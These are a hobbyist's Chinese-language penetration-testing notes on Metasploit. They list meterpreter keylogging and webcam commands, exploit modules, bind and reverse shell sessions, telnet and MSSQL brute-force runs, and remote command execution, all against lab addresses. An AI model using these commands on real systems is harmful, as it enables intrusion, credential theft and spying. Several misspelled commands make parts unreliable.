渗透测试笔记

09.23 - 09.26|Xianyu233

2019/9/26

一个普通人的爱好

---

 

 

# OSI七层网络模型

OSI七层网络模型	tcp/ip四层概念模型	对应的网络协议
应用层	应用层	HTTP FTP DNS
表示层
会话层
传输层	传输层	TCP UDP SCTP RTP
网络层	网络层	IP ARP RARP ICMP IGMP
数据链路层	网络接口层
物理层

 

# Msfconsole使用笔记

• Mestaploit是一款开源的安全漏洞漏洞检测工具

 

# 常用命令

background                      //处于后台
session -i index                //与会话进行交互 
quit                            //推出会话
shell                           //获得控制台权限
upload /root/Desktop/netcat.exe c:\\    //上传文件到目标
download nimeia.txt /root/Desktop       //下载文件到本机
execute -H -i -f cmd.exe                //创建新进程cmd.exe
sysionfo                        //查看目标系统信息
shutdown                        //关机
keyscan_start                   //开启键盘记录
keyscan_dump                    //提取键盘记录
keyscan_stop                    //关闭键盘记录
webscam_snap                    //从指定的摄像头拍摄照片

 

# 可以利用的模块

445端口:

• exploit/windows/smb/ms17_
• exploit/windows/smb/ms08_067_netapi

135端口:

• exploit/windows/dcerpc/ms03_026_dcom

缓冲溢出:

• exploit/windows/iis/ms01_033_idq

生成木马:

 

# 攻击Linux

set RHOSTS IP
set username root
set PASS_FILE /xxx.txt        //文件路径
run    /     exploit          //开始运行/攻击 
sessions -i 1                //打开会话
gcc -o 转换的文件
show option                    //查看定义的参数
packet captre                //抓包
#MaxAuthTries 6                //最大的次数
exploit                        //启动exploit模块
run                            //启动非入侵的模块
use ____                       //使用模块
search _____                   //搜索模块
set _____ _____                //指令不同的选项
ext                            //退出

# 正向连接

root@kali:/# msfconsole 
msf5 > use exploit/windows/iis/ms01_033_idq
msf5 exploit(windows/iis/ms01_033_idq) > set payload windows/shell/bind_tcp
msf5 exploit(windows/iis/ms01_033_idq) > show options
msf5 exploit(windows/iis/ms01_033_idq) > set RHOSTS 192.168.1.133
RHOSTS => 192.168.1.133
msf5 exploit(windows/iis/ms01_033_idq) > set target 1 
target => 1
msf5 exploit(windows/iis/ms01_033_idq) > exploit

# 反向连接

root@kali:/# msfconsole
msf5 > use exploit/windows/iis/ms01_033_idq
msf5 exploit(windows/iis/ms01_033_idq) > set payload windows/shell/reverse_tcp
msf5 exploit(windows/iis/ms01_033_idq) > set target 1 
target => 1
msf5 exploit(windows/iis/ms01_033_idq) > set RHOSTS 192.168.1.133
RHOSTS => 192.168.1.133
msf5 exploit(windows/iis/ms01_033_idq) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf5 exploit(windows/iis/ms01_033_idq) > set LHOST 端口   
msf5 exploit(windows/iis/ms01_033_idq) > exploit

# ARP扫描

root@kali:/# msfconsole
msf5 > use auxiliary/scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > run

 

# Telnet攻击

root@kali:/# msfconsole
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.1.11
msf5 auxiliary(scanner/telnet/telnet_login) > set PASS_FILE 字典路径
msf5 auxiliary(scanner/telnet/telnet_login) > set USERNAME administrator
msf5 auxiliary(scanner/telnet/telnet_login) > run

# Mssql_exec

root@kali:/# msfconsole
msf5 > use auxiliary/admin/mssql/mssql_exec
msf5 auxiliary(admin/mssql/mssql_exec) > set RHOST 192.168.1.11
RHOST => 192.168.1.11
msf5 auxiliary(admin/mssql/mssql_exec) > set PASSWORD 数据库密码
msf5 auxiliary(admin/mssql/mssql_exec) > set CMD cmd.exe\ /c\ echo\ OWNED\ >\ C:\owned.exe
msf5 auxiliary(admin/mssql/mssql_exec) > run

 

# Mssql_login 

root@kali:/# msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set RHOST 192.168.1.11
msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FAILE
msf5 auxiliary(scanner/mssql/mssql_login) > run